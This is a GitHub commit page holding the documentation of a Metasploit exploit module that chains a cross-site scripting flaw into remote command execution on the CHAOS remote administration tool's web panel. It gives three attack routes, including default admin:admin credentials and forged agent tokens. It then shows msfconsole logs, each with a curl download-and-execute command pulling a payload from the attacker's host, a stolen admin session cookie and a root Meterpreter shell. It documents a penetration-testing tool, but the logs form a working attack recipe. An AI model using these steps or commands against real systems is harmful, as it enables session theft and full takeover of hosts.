Skip to content

Commit 67154a1

Browse files
cgranleese-r7cgranleese-r7
authored
Land rapid7#19104, CHAOS rat xss to rce
2 parents 6301d84 + d1739f3 commit 67154a1

File tree

2 files changed

+685
-0
lines changed

2 files changed

+685
-0
lines changed

documentation/modules/exploit/linux/http/chaos_rat_xss_to_rce.md

Lines changed: 267 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,267 @@
1+
## Vulnerable Application
2+
3+
CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
4+
allows generated binaries to control remote operating systems. The
5+
webapp contains a remote command execution vulnerability which
6+
can be triggered by an authenticated user when generating a new
7+
executable. The webapp also contains an XSS vulnerability within
8+
the view of a returned command being executed on an agent.
9+
10+
Execution can happen through one of three routes:
11+
12+
1. Provided credentials can be used to execute the RCE directly
13+
2. A `JWT` token from an agent can be provided to emulate a compromised
14+
host. If a logged in user attempts to execute a command on the host
15+
the returned value contains an xss payload.
16+
3. Similar to technique 2, an agent executable can be provided and the
17+
`JWT` token can be extracted.
18+
19+
Verified against CHAOS `7d5b20ad7e58e5b525abdcb3a12514b88e87cef2` running
20+
in a docker container.
21+
22+
### Install
23+
24+
Docker image: `docker run -it -v ~/chaos-container:/database/ -v ~/chaos-container:/temp/ -e PORT=8080 -e SQLITE_DATABASE=chaos -p 8080:8080 tiagorlampert/chaos:latest`
25+
26+
To generate an agent, login (`admin`:`admin`). Click the triple lines
27+
to expand the menu, select `Manage`, `Generate Client`. Click `Build`.
28+
29+
## Verification Steps
30+
31+
1. Install the application or run the docker image
32+
1. Start msfconsole
33+
1. Do: `use exploit/linux/http/chaos_rat_xss_to_rce`
34+
1. Do: `set rhost [ip]`
35+
1. Pick a method:
36+
1. `set username [username]`, `set password [password]`
37+
2. `set jwt [jwt token]`
38+
3. `set agent [path to agent]`
39+
1. Do: `run`
40+
1. You should get a shell. Interaction by a CHAOS admin may be required
41+
42+
## Options
43+
44+
### USERNAME
45+
46+
User to login with, default for CHAOS is `admin`.
47+
48+
### PASSWORD
49+
50+
Password to login with, default for CHAOS is `admin`.
51+
52+
### JWT
53+
54+
JWT token from an agent. Used to emulate a compromised
55+
host.
56+
57+
### AGENT
58+
59+
The path to an agent executable generated by CHAOS. Used to emulate a compromised host.
60+
61+
## Advanced Options
62+
63+
### AGENT_HOSTNAME
64+
65+
Hostname for a fake agent. Defaults to `DC01`.
66+
67+
### AGENT_USERNAME
68+
69+
Username for a fake agent. Defaults to `Administrator`.
70+
71+
### AGENT_USERID
72+
73+
User ID for a fake agent. Defaults to `Administrator`.
74+
75+
### AGENT_OS
76+
77+
OS for a fake agent. Choices are `Windows`, or `Linux`.
78+
Defaults to `Windows`.
79+
80+
## Scenarios
81+
82+
### Docker Image
83+
84+
#### Agent Method
85+
86+
```
87+
[*] Processing chaos.rb for ERB directives.
88+
resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
89+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
90+
resource (chaos.rb)> set rhosts 127.0.0.1
91+
rhosts => 127.0.0.1
92+
resource (chaos.rb)> set FETCH_SRVPORT 9090
93+
FETCH_SRVPORT => 9090
94+
resource (chaos.rb)> set agent malware2.exe
95+
agent => malware2.exe
96+
resource (chaos.rb)> set SRVHOST 111.111.10.147
97+
SRVHOST => 111.111.10.147
98+
resource (chaos.rb)> set SRVPORT 8888
99+
SRVPORT => 8888
100+
resource (chaos.rb)> set verbose true
101+
verbose => true
102+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
103+
104+
[*] Command to run on remote host: curl -so ./SPSVaaJxd http://111.111.10.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./SPSVaaJxd; ./SPSVaaJxd &
105+
[*] Exploit running as background job 0.
106+
[*] Exploit completed, but no session was created.
107+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
108+
[*] Fetch handler listening on 111.111.10.147:9090
109+
[*] HTTP server started
110+
[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
111+
[*] Started reverse TCP handler on 111.111.10.147:4444
112+
[*] Running automatic check ("set AutoCheck false" to disable)
113+
[!] The service is running, but could not be validated. Chaos application found
114+
[*] Attempting exploitation through Agent
115+
[*] Server address: 172.17.0.2
116+
[*] Server port: 8080
117+
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDQ4MDY5MzgsInVzZXIiOiJkZWZhdWx0In0.3zlOZ8RI_YdDqEgNbt20oL7R30Ry5JgwJVCEqx0WSUA
118+
[*] Fake MAC for agent: f8:16:5a:23:5b:74
119+
[*] Listening for XSS response on: http://111.111.10.147:8888/
120+
[*] Performing Callback Checkin
121+
[*] WebSocket connecting to receive commands
122+
[*] Performing Callback Checkin
123+
```
124+
125+
Log in to the website, click `Acion`, `Remote Shell` on the
126+
fake agent we've added to the list. Now type anything into
127+
the input box and click `Send`.
128+
129+
```
130+
[+] Received agent command 'id', sending XSS in return
131+
[*] Received GET request.
132+
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
133+
[+] Detected Agents
134+
Live Agents
135+
===========
136+
137+
IP OS Username Hostname MAC
138+
-- -- -------- -------- ---
139+
111.111.1 Windows Administra DC01 86:89:42:d1:dc
140+
1.147 tor (Admin :a7
141+
istrator)
142+
111.111.1 Windows Administra DC01 f8:16:5a:23:5b
143+
1.147 tor (Admin :74
144+
istrator)
145+
146+
[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
147+
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
148+
[*] Transmitting intermediate stager...(126 bytes)
149+
[*] Sending stage (3045380 bytes) to 172.17.0.2
150+
[*] Meterpreter session 1 opened (111.111.10.147:4444 -> 172.17.0.2:41290) at 2024-04-17 15:19:22 +0000
151+
152+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > sessions -i 1
153+
[*] Starting interaction with 1...
154+
155+
meterpreter > getuid
156+
Server username: root
157+
meterpreter > sysinfo
158+
Computer : 172.17.0.2
159+
OS : Debian 11.4 (Linux 5.19.0-43-generic)
160+
Architecture : x64
161+
BuildTuple : x86_64-linux-musl
162+
Meterpreter : x64/linux
163+
meterpreter >
164+
```
165+
166+
#### JWT Method
167+
168+
```
169+
[*] Processing chaos.rb for ERB directives.
170+
resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
171+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
172+
resource (chaos.rb)> set rhosts 127.0.0.1
173+
rhosts => 127.0.0.1
174+
resource (chaos.rb)> set FETCH_SRVPORT 9090
175+
FETCH_SRVPORT => 9090
176+
resource (chaos.rb)> set jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
177+
jwt => eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
178+
resource (chaos.rb)> set SRVHOST 111.111.63.147
179+
SRVHOST => 111.111.63.147
180+
resource (chaos.rb)> set SRVPORT 8888
181+
SRVPORT => 8888
182+
resource (chaos.rb)> set verbose true
183+
verbose => true
184+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
185+
186+
[*] Command to run on remote host: curl -so ./HVHYAPykfOV http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./HVHYAPykfOV; ./HVHYAPykfOV &
187+
[*] Exploit running as background job 0.
188+
[*] Exploit completed, but no session was created.
189+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
190+
[*] Fetch handler listening on 111.111.63.147:9090
191+
[*] HTTP server started
192+
[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
193+
[*] Started reverse TCP handler on 111.111.63.147:4444
194+
[*] Running automatic check ("set AutoCheck false" to disable)
195+
[!] The service is running, but could not be validated. Chaos application found
196+
[*] Attempting exploitation through JWT token
197+
[*] Fake MAC for agent: d9:74:62:8e:fc:43
198+
[*] Listening for XSS response on: http://111.111.63.147:8888/
199+
[*] Performing Callback Checkin
200+
[*] WebSocket connecting to receive commands
201+
```
202+
203+
Log in to the website, click `Acion`, `Remote Shell` on the
204+
fake agent we've added to the list. Now type anything into
205+
the input box and click `Send`.
206+
207+
```
208+
[+] Received agent command 'whoami', sending XSS in return
209+
[*] Received GET request.
210+
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzEwMTAsIm9yaWdfaWF0IjoxNzEzMzY3NDEwLCJ1c2VyIjoiYWRtaW4ifQ.K-DCy8qNaxAHVx2Hu_Z-Ff7ZEG_TWkaount8wEM0clk
211+
[+] Detected Agents
212+
Live Agents
213+
===========
214+
215+
IP OS Username Hostname MAC
216+
-- -- -------- -------- ---
217+
111.111.63 Windows Administrat DC01 d9:74:62:8e:fc
218+
.147 or (Adminis :43
219+
trator)
220+
221+
[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
222+
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
223+
[*] Transmitting intermediate stager...(126 bytes)
224+
[*] Sending stage (3045380 bytes) to 172.17.0.2
225+
[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:55572) at 2024-04-17 15:32:59 +0000
226+
```
227+
228+
### Credentialed Method
229+
230+
```
231+
[*] Processing chaos.rb for ERB directives.
232+
resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
233+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
234+
resource (chaos.rb)> set rhosts 127.0.0.1
235+
rhosts => 127.0.0.1
236+
resource (chaos.rb)> set FETCH_SRVPORT 9090
237+
FETCH_SRVPORT => 9090
238+
resource (chaos.rb)> set username admin
239+
username => admin
240+
resource (chaos.rb)> set password admin
241+
password => admin
242+
resource (chaos.rb)> set SRVHOST 111.111.63.147
243+
SRVHOST => 111.111.63.147
244+
resource (chaos.rb)> set SRVPORT 8888
245+
SRVPORT => 8888
246+
resource (chaos.rb)> set verbose true
247+
verbose => true
248+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
249+
250+
[*] Command to run on remote host: curl -so ./FdfcLgdHSudl http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./FdfcLgdHSudl; ./FdfcLgdHSudl &
251+
[*] Exploit running as background job 0.
252+
[*] Exploit completed, but no session was created.
253+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
254+
[*] Fetch handler listening on 111.111.63.147:9090
255+
[*] HTTP server started
256+
[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
257+
[*] Started reverse TCP handler on 111.111.63.147:4444
258+
[*] Running automatic check ("set AutoCheck false" to disable)
259+
[!] The service is running, but could not be validated. Chaos application found
260+
[*] Attempting exploitation through direct login
261+
[*] Attempting login
262+
[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
263+
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
264+
[*] Transmitting intermediate stager...(126 bytes)
265+
[*] Sending stage (3045380 bytes) to 172.17.0.2
266+
[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:59770) at 2024-04-17 15:40:11 +0000
267+

0 commit comments

Comments
 (0)